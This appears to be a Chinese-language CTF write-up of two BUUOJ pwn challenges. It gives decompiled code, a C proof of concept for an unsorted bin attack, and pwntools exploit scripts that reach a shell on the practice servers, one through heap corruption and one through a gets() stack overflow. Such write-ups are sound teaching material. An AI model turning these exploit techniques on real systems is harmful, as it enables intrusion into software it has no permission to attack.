BUU PWN

First Post:

Last Update:

Word Count:
513

Read Time:
3 min

BUU PWN

hitcontraining_magicheap

只需使

1
2
3
4
5
6
7
8
9
10
11
12
if ( v3 == 4869 )
    {
      if ( (unsigned __int64)magic <= 0x1305 )
      {
        puts("So sad !");
      }
      else
      {
        puts("Congrt !");
        l33t();
      }
    }

magic > 0x1305即可,然而采用unsorted bin attack可以实现。

unsorted bin attack知识回顾

poc

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main()
{
    char *ptr = NULL, *controllable_chunk, *trigger;

    controllable_chunk = malloc(400);
    malloc(10); // 防止与top chunk合并

    free(controllable_chunk);
    // controllable_chunk->bk = target - size_t*2
    ((void **)controllable_chunk)[1] = &ptr - 2;

    // 注意,这里要和free的size相同,否则会引发异常
    trigger = malloc(400);

    fprintf(stderr, "ptr: %p\n ", ptr);

    return 0;
}

ref: http://blog.eonew.cn/archives/623

exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
#! /usr/bin/python

from pwn import *

#io = process('./magicheap')
io = remote('node3.buuoj.cn', 28961)

def add(sz, d):
    io.sendlineafter(':', '1')
    io.sendlineafter(':', str(sz))
    io.sendafter(':', d)
    

def rm(idx):
    io.sendlineafter(':', '3')
    io.sendlineafter(':', str(idx))


def edit(idx, sz, d):
    io.sendlineafter(':', '2')
    io.sendlineafter(':', str(idx))
    io.sendlineafter(':', str(sz))
    io.sendafter(':', d)
    
add(0x80, 'A')
add(0x400, 'B')
add(0x80, 'C')

rm(1)
p =  b'\x00' * 0x80
p += p64(0) + p64(0x411)
p += p64(0) + p64(0x6020A0 - 0x10)
edit(0, len(p), p)
# unsorted bin attack
add(0x400, 'B')


#gdb.attach(io)
# get shell
io.sendlineafter(':', '4869')
io.interactive()

flag{02e8c026-509a-4dcc-bbdd-47272f8f63bb}

mrctf2020_easyoverflow

main

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
int __cdecl main(int argc, const char **argv, const char **envp)
{
  char v4[48]; // [rsp+0h] [rbp-70h] BYREF
  char v5[24]; // [rsp+30h] [rbp-40h] BYREF
  __int64 v6; // [rsp+48h] [rbp-28h]
  __int64 v7; // [rsp+50h] [rbp-20h]
  __int64 v8; // [rsp+58h] [rbp-18h]
  __int16 v9; // [rsp+60h] [rbp-10h]
  unsigned __int64 v10; // [rsp+68h] [rbp-8h]

  v10 = __readfsqword(0x28u);
  strcpy(v5, "ju3t_@_f@k3_f1@g");
  v6 = 0LL;
  v7 = 0LL;
  v8 = 0LL;
  v9 = 0;
  gets(v4, argv);
  if ( !(unsigned int)check((__int64)v5) )
    exit(0);
  system("/bin/sh");
  return 0;
}

check

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
__int64 __fastcall check(__int64 a1)
{
  int i; // [rsp+18h] [rbp-8h]
  int v3; // [rsp+1Ch] [rbp-4h]

  v3 = strlen(fake_flag);
  for ( i = 0; ; ++i )
  {
    if ( i == v3 )
      return 1LL;
    if ( *(_BYTE *)(i + a1) != fake_flag[i] )
      break;
  }
  return 0LL;
}

gets存在漏洞,然而v5与fake_flag字符串不同,只需使v5字符串为fake_flag即可,也就是赋值为‘n0t_r3@11y_f1@g\x00’

exp

1
2
3
4
5
6
7
8
9
10
#! /usr/bin/python
from pwn import *

#io = process('./mrctf2020_easyoverflow')
io = remote('node3.buuoj.cn', 27093)
p = b'A' * 48
p += b'n0t_r3@11y_f1@g\x00'
io.sendline(p)

io.interactive()

flag{fd1881f7-e080-4481-b01f-f2e27c15502c}

更新中…

打赏点小钱
支付宝 | Alipay
微信 | WeChat